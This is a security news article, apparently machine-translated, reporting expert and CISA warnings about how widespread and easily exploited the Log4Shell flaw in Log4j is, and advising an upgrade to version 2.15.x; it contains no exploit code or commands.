Log4Shell is scary: extremely widespread and easy to exploit vulnerability. Hurry up

The Zeroday Rift CVE-2021-44228baptized with the name of Log4Shell, represents a major cybersecurity issue that will take monthseven years, to be able to be completely resolved due to its dissemination and the ease of exploitation of the flaw itself: the opinion on which various computer security researchers converge after Log4Shell came to light Thursday, December 9 last.

On the subject also voices the United States Cybersecurity and Infrastructure Security Agency, pointing out that the vulnerability affects hundreds of millions of devices and that “no single action will fix the problem”, stating that it is a mistake to think that things can be fixed “in a week or two”. CISA warns that the vulnerability will likely be exploited as springboard for diverse and sophisticated types of attacks and compromisesand that the time needed to take shelter is really limited.

We remind you that Log4Shell is a vulnerability affecting the open-source Java tool Log4j, widely used for logging operations on an infinite number of applications and services, and which allows remote code execution without authentication. Its distribution is therefore extremely wide, which combined with the ease of exploitation of the flaw makes Log4Shell a particularly serious threat, even more important than HeathBleed, EternalBlue or ShellShock.

While, at least for now, the vulnerability appears to have been exploited primarily to deliver cryptomining malware, security researchers expect to see an evolution in the type of attacks. The ability to execute unauthenticated remote code in a simple way opens up a wide range of possibilities for attackers. Steve Povolnyresponsible for advanced threat research for McAfee Enterprise and FireEye, observed that with the increasing number of activities following the discovery of the flaw, it is reasonable to assume that many realities may have already been compromised. Povolny also warns about the possibility of observing an evolution of the attacks.

Sean Gallagherresearcher for Sophos, pointed out in particular that the vulnerability could be exploited by attackers attempting to install remote access and persistence tools and is already being used to attempt to expose keys used by Amazon Web Service accounts.

Second Casey John EllisSecurity expert and founder of Bugcrowd, HeartBleed’s problem is far more serious, as log4j propagation and various interdependencies are “orders of magnitude higher”. Florian Roth from Nextron Systems talks about a “0day cluster bomb”, and what Log4Shell is a vulnerability that can potentially cause hundreds and thousands more zeroday flaws in all kinds of software.

And in particular concerning the diffusion of the problem, Jaana Doganlead engineer for AWS, to provide additional context:

The immediate action to take to eliminate the flaw is to update Log4j to at least version 2.15.x which requires Java 8. Those who cannot update Log4j due to complex interdependencies can resort to partial solutions and temporary, well summarized in this complete and in-depth collection on Log4Shell.